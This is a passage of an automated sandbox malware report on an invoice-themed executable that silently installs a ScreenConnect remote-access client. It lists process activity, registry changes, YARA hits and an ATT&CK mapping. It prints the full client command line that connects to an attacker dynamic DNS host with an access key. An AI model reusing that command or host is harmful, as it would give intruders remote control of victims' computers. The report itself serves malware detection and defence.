                              Source: 0.2.invoice-benefits-agency9-24-2024.exe.5cc0000.3.raw.unpack, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                              Source: 0.2.invoice-benefits-agency9-24-2024.exe.5c90000.1.raw.unpack, Program.csReference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"Jump to behavior
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (e6cb77284cf765aa)\screenconnect.clientservice.exe" "?e=access&y=guest&h=mmf351.ddns.net&p=8041&s=64aa4158-b0dc-4cfb-a3e6-dfec05b77827&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&t=invoice&c=choicebenefitsagency&c=https%3a%2f%2fchoicebenefitsagency.com&c=choicebenefitsagency&c=&c=&c=&c=&c="
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1401316749.0000000000CD2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Progman
                              Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1401316749.0000000000CD2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_050E054C CreateNamedPipeW,8_2_050E054C
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_01074D2E RtlGetVersion,8_2_01074D2E
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication PackagesJump to behavior
                              Source: Yara matchFile source: invoice-benefits-agency9-24-2024.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.2.invoice-benefits-agency9-24-2024.exe.5fa0000.8.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 9.0.ScreenConnect.WindowsClient.exe.cd0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 9.2.ScreenConnect.WindowsClient.exe.306fa20.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 10.2.ScreenConnect.WindowsClient.exe.276fa60.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.invoice-benefits-agency9-24-2024.exe.5fa0000.8.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.invoice-benefits-agency9-24-2024.exe.ff5db8.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.invoice-benefits-agency9-24-2024.exe.fcc3d8.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.invoice-benefits-agency9-24-2024.exe.f463d8.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.invoice-benefits-agency9-24-2024.exe.f30000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000002.1366628403.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000009.00000002.2593006992.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000009.00000000.1401316749.0000000000CD2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000A.00000002.1453273212.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1357879683.0000000003521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000000.1337072168.0000000000F46000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: invoice-benefits-agency9-24-2024.exe PID: 7540, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7808, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 8024, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 8152, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Config.Msi\5d26dd.rbs, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\MSI299C.tmp, type: DROPPED
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire Infrastructure1
                              Valid Accounts
                              31
                              Windows Management Instrumentation
                              1
                              DLL Side-Loading
                              1
                              DLL Side-Loading
                              11
                              Disable or Modify Tools
                              OS Credential Dumping11
                              Peripheral Device Discovery
                              Remote Services11
                              Archive Collected Data
                              2
                              Encrypted Channel
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomains1
                              Replication Through Removable Media
                              1
                              Native API
                              1
                              DLL Search Order Hijacking
                              1
                              DLL Search Order Hijacking
                              1
                              Deobfuscate/Decode Files or Information
                              LSASS Memory1
                              File and Directory Discovery
                              Remote Desktop ProtocolData from Removable Media1
                              Non-Standard Port
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts12
                              Command and Scripting Interpreter
                              1
                              Valid Accounts
                              1
                              Valid Accounts
                              1
                              Obfuscated Files or Information
                              Security Account Manager45
                              System Information Discovery
                              SMB/Windows Admin SharesData from Network Shared Drive1
                              Non-Application Layer Protocol
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron2
                              Windows Service
                              1
                              Access Token Manipulation
                              1
                              Software Packing
                              NTDS21
                              Security Software Discovery
                              Distributed Component Object ModelInput Capture11
                              Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchd1
                              Bootkit
                              2
                              Windows Service
                              1
                              DLL Side-Loading
                              LSA Secrets2
                              Process Discovery
                              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts13
                              Process Injection
                              1
                              DLL Search Order Hijacking
                              Cached Domain Credentials51
                              Virtualization/Sandbox Evasion
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                              File Deletion
                              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job122
                              Masquerading
                              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                              Valid Accounts
                              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                              Access Token Manipulation
                              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd51
                              Virtualization/Sandbox Evasion
                              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task13
                              Process Injection
                              KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                              Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                              Hidden Users
                              GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                              Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                              Bootkit
                              Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                              Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess Injection1
                              Rundll32
                              Credential API HookingDomain GroupsExploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523872 Sample: invoice-benefits-agency9-24... Startdate: 02/10/2024 Architecture: WINDOWS Score: 48 55 mmf351.ddns.net 2->55 61 Multi AV Scanner detection for submitted file 2->61 63 .NET source code contains potential unpacker 2->63 65 .NET source code references suspicious native API functions 2->65 69 4 other signatures 2->69 8 msiexec.exe 94 51 2->8         started        12 ScreenConnect.ClientService.exe 2 5 2->12         started        15 invoice-benefits-agency9-24-2024.exe 5 2->15         started        signatures3 67 Uses dynamic DNS services 55->67 process4 dnsIp5 35 C:\...\ScreenConnect.WindowsClient.exe, PE32 8->35 dropped 37 C:\...\ScreenConnect.ClientService.exe, PE32 8->37 dropped 39 C:\...\ScreenConnect.WindowsClient.exe.config, XML 8->39 dropped 43 10 other files (none is malicious) 8->43 dropped 75 Enables network access during safeboot for specific services 8->75 77 Modifies security policies related information 8->77 17 msiexec.exe 8->17         started        19 msiexec.exe 1 8->19         started        21 msiexec.exe 8->21         started        57 mmf351.ddns.net 79.110.49.16, 49703, 8041 OTAVANET-ASCZ Germany 12->57 79 Reads the Security eventlog 12->79 81 Reads the System eventlog 12->81 23 ScreenConnect.WindowsClient.exe 3 12->23         started        26 ScreenConnect.WindowsClient.exe 2 12->26         started        41 invoice-benefits-agency9-24-2024.exe.log, ASCII 15->41 dropped 83 Contains functionality to hide user accounts 15->83 28 msiexec.exe 6 15->28         started        file6 signatures7 process8 file9 31 rundll32.exe 11 17->31         started        71 Creates files in the system32 config directory 23->71 73 Contains functionality to hide user accounts 23->73 45 C:\Users\user\AppData\Local\...\MSI22D5.tmp, PE32 28->45 dropped signatures10 process11 file12 47 C:\Users\user\...\ScreenConnect.Windows.dll, PE32 31->47 dropped 49 C:\...\ScreenConnect.InstallerActions.dll, PE32 31->49 dropped 51 C:\Users\user\...\ScreenConnect.Core.dll, PE32 31->51 dropped 53 4 other files (none is malicious) 31->53 dropped 59 Contains functionality to hide user accounts 31->59 signatures13

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              invoice-benefits-agency9-24-2024.exe18%ReversingLabsWin32.Trojan.Generic
                              SourceDetectionScannerLabelLink
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe3%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dll0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dll0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\MSI22D5.tmp0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI22D5.tmp0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\Microsoft.Deployment.Compression.Cab.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\Microsoft.Deployment.Compression.Cab.dll0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\Microsoft.Deployment.Compression.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\Microsoft.Deployment.Compression.dll0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\ScreenConnect.Core.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\ScreenConnect.Core.dll0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\ScreenConnect.InstallerActions.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\ScreenConnect.InstallerActions.dll0%VirustotalBrowse
                              C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\ScreenConnect.Windows.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\ScreenConnect.Windows.dll0%VirustotalBrowse
                              C:\Windows\Installer\MSI29CB.tmp0%ReversingLabs
                              C:\Windows\Installer\MSI29CB.tmp0%VirustotalBrowse
                              C:\Windows\Installer\MSI2E03.tmp0%ReversingLabs
                              C:\Windows\Installer\MSI2E03.tmp0%VirustotalBrowse
                              No Antivirus matches
                              No Antivirus matches
                              SourceDetectionScannerLabelLink
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                              http://wixtoolset.org/releases/0%VirustotalBrowse
                              http://wixtoolset.org/news/0%VirustotalBrowse
                              http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v0%VirustotalBrowse
                              https://choicebenefitsagency.com0%VirustotalBrowse
                              https://docs.rs/getrandom#nodejs-es-module-support0%VirustotalBrowse
                              https://feedback.screenconnect.com/Feedback.axd0%VirustotalBrowse
                              NameIPActiveMaliciousAntivirus DetectionReputation
                              mmf351.ddns.net
                              79.110.49.16
                              truetrue
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://wixtoolset.org/releases/rundll32.exe, 00000005.00000003.1363549444.0000000004ACE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1363773395.00000000049C3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1363549444.0000000004B3D000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.drfalseunknown
                                https://choicebenefitsagency.comLR_qScreenConnect.ClientService.exe, 00000008.00000002.2594997092.0000000001E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  http://wixtoolset.org/news/rundll32.exe, 00000005.00000003.1363549444.0000000004ACE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1363773395.00000000049C3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1363549444.0000000004B3D000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.drfalseunknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameScreenConnect.ClientService.exe, 00000008.00000002.2594997092.0000000001CFD000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1453273212.00000000026F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://choicebenefitsagency.comScreenConnect.WindowsClient.exe, 0000000A.00000002.1453273212.00000000027DE000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                  http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/vrundll32.exe, 00000005.00000003.1363549444.0000000004ACE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1363773395.00000000049C3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1363549444.0000000004B3D000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.drfalseunknown
                                  https://feedback.screenconnect.com/Feedback.axdScreenConnect.Core.dll.3.drfalseunknown
                                  https://docs.rs/getrandom#nodejs-es-module-supportScreenConnect.WindowsCredentialProvider.dll.3.drfalseunknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  79.110.49.16
                                  mmf351.ddns.netGermany
                                  57287OTAVANET-ASCZtrue
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1523872
                                  Start date and time:2024-10-02 06:12:07 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 8m 49s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:15
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:invoice-benefits-agency9-24-2024.exe
                                  Detection:MAL
                                  Classification:mal48.troj.evad.winEXE@17/56@1/1
                                  EGA Information:
                                  • Successful, ratio: 60%
                                  HCA Information:
                                  • Successful, ratio: 68%
                                  • Number of executed functions: 444
                                  • Number of non-executed functions: 8
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target invoice-benefits-agency9-24-2024.exe, PID 7540 because it is empty
                                  • Execution Graph export aborted for target rundll32.exe, PID 7808 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
